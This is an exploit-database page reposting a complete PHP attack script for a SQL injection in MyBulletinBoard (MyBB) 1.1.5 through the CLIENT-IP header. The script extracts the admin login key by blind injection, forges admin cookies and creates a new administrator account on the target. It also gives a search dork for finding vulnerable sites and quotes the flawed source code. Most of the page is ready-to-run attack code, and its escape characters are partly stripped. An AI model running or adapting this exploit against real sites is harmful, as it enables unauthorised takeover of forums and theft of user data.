Advertisement






MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection

CVE Category Price Severity
CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2006-07-26
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070099

Below is a copy:

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploitn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]n";

echo "site: http://retrogod.altervista.orgn";

echo "dork, version specific: "Powered By MyBB" "2006 MyBB Group"nn";

/*

works regardless of php.ini settings

*/

if ($argc<3) {

echo "Usage: php ".$argv[0]." host path OPTIONSn";

echo "host:      target server (ip/hostname)n";

echo "path:      path to MyBBn";

echo "Options:n";

echo "   -T[prefix]   specify a table prefix different from default (mybb_)n";

echo "   -u[number]   specify a user id other than 1 (usually admin)n";

echo "   -p[port]:    specify a port other than 80n";

echo "   -P[ip:port]: specify a proxyn";

echo "   -d:          disclose table prefix (reccomended)n";

echo "Example:rn";

echo "php ".$argv[0]." localhost /MyBB/ -drn";

echo "php ".$argv[0]." localhost /MyBB/ -Tmy_rn";

die;

}

/* software site: http://www.mybboard.com/

vulnerable code in inc/functions.php near lines 1292-1320:

...

function getip() {

global $_SERVER;

if($_SERVER['HTTP_X_FORWARDED_FOR'])

{

if(preg_match_all("#[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))

{

while(list($key, $val) = each($addresses[0]))

{

if(!preg_match("#^(10|172.16|192.168).#", $val))

{

$ip = $val;

break;

}

}

}

}

if(!$ip)

{

if($_SERVER['HTTP_CLIENT_IP'])

{

$ip = $_SERVER['HTTP_CLIENT_IP'];

}

else

{

$ip = $_SERVER['REMOTE_ADDR'];

}

}

return $ip;

}

...

you can spoof your ip address through the CLIENT-IP http header...

as result you can inject sql statements in class_session.php at lines 36-68:

by calling the main index.php script

...

function init()

{

global $ipaddress, $db, $mybb, $noonline;

//

// Get our visitors IP

//

$this->ipaddress = $ipaddress = getip();

//

// User-agent

//

$this->useragent = $_SERVER['HTTP_USER_AGENT'];

if(strlen($this->useragent) > 100)

{

$this->useragent = substr($this->useragent, 0, 100);

}

//

// Attempt to find a session id in the cookies

//

if($_COOKIE['sid'])

{

$this->sid = addslashes($_COOKIE['sid']);

}

else

{

$this->sid = 0;

}

//

// Attempt to load the session from the database

//

$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");

...

injection is blind, but you can ask true-false questions to the database to

retrieve the admin loginkey.

Through that you can build an admin cookie and create a new admin user through

the admin/users.php script.

Also you can disclose table prefix.

------------------------------------------------------------------------
--------

-***********************************************************************
******-

*                                                                            *

* Italia - Germania 2-0, al 114' forse il pi&ugrave; bel gol che abbia mai visto    *

* grazie Grosso!                                                             *

*                                                                            *

-***********************************************************************
******-

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.="  .";}

else

{$result.="  ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

function make_seed()

{

list($usec, $sec) = explode(' ', microtime());

return (float) $sec + ((float) $usec * 100000);

}

srand(make_seed());

$anumber = rand(1,99999);

$host=$argv[1];

$path=$argv[2];

$port=80;

$prefix="mybb_";

$user_id="1";//admin

$proxy="";

$dt=0;

for ($i=3; $i<$argc; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]);

}

if ($temp=="-u")

{

$user_id=str_replace("-u","",$argv[$i]);

}

if ($temp=="-d")

{

$dt=1;

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)

{

$sql="'suntzuuuu/*";

echo "sql -> ".$sql."rn";

$packet ="GET ".$p."index.php HTTP/1.0rn";

$packet.="CLIENT-IP: $sqlrn";

$packet.="Host: ".$host."rn";

$packet.="Connection: Closernrn";

sendpacketii($packet);

if (eregi("You have an error in your SQL syntax",$html))

{

$temp=explode("sessions",$html);

$temp2=explode(" ",$temp[0]);

$prefix=$temp2[count($temp2)-1];

echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"n";

}

else

{

echo "unable to disclose table prefix...n";

}

sleep(1);

}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(65,90));//A-Z letters

$chars=array_merge($chars,range(97,122));//a-f letters

$j=1;

$loginkey="";

while (!strstr($loginkey,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";

echo "sql -> ".$sql."rn";

$packet ="GET ".$p."index.php HTTP/1.0rn";

$packet.="CLIENT-IP: $sqlrn";

$packet.="Host: ".$host."rn";

$packet.="Connection: Closernrn";

sendpacketii($packet);

if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]rn";sleep(1);break;}

}

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";

echo "admin cookie -> ".$cookie."rn";

$data='-----------------------------7d62702f250530

Content-Disposition: form-data; name="action";

do_add

-----------------------------7d62702f250530

Content-Disposition: form-data; name="userusername";

suntzu'.$anumber.'

-----------------------------7d62702f250530

Content-Disposition: form-data; name="newpassword";

suntzu'.$anumber.'

-----------------------------7d62702f250530

Content-Disposition: form-data; name="email";

suntzoi (at) suntzu (dot) org [email concealed]

-----------------------------7d62702f250530

Content-Disposition: form-data; name="usergroup";

4

-----------------------------7d62702f250530

Content-Disposition: form-data; name="additionalgroups[]";

4

-----------------------------7d62702f250530

Content-Disposition: form-data; name="displaygroup";

4

-----------------------------7d62702f250530

Content-Disposition: form-data; name="Add User";

Add User

-----------------------------7d62702f250530--

';

$packet="POST ".$p."admin/users.php HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Cookie: ".$cookie."rn";

$packet.="Connection: Closernrn";

$packet.=$data;

sendpacketii($packet);

if (eregi("The user has successfully been added",$html))

{

echo "exploit succeeded... now login as adminn";

echo "with username "suntzu".$anumber."" and password "suntzu".$anumber.""n";

}

else

{

echo "something goes wrong...n";if(!$dt)echo "you may try -d optionn";

}

?>

original url: http://retrogod.altervista.org/mybb_115_sql.html

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.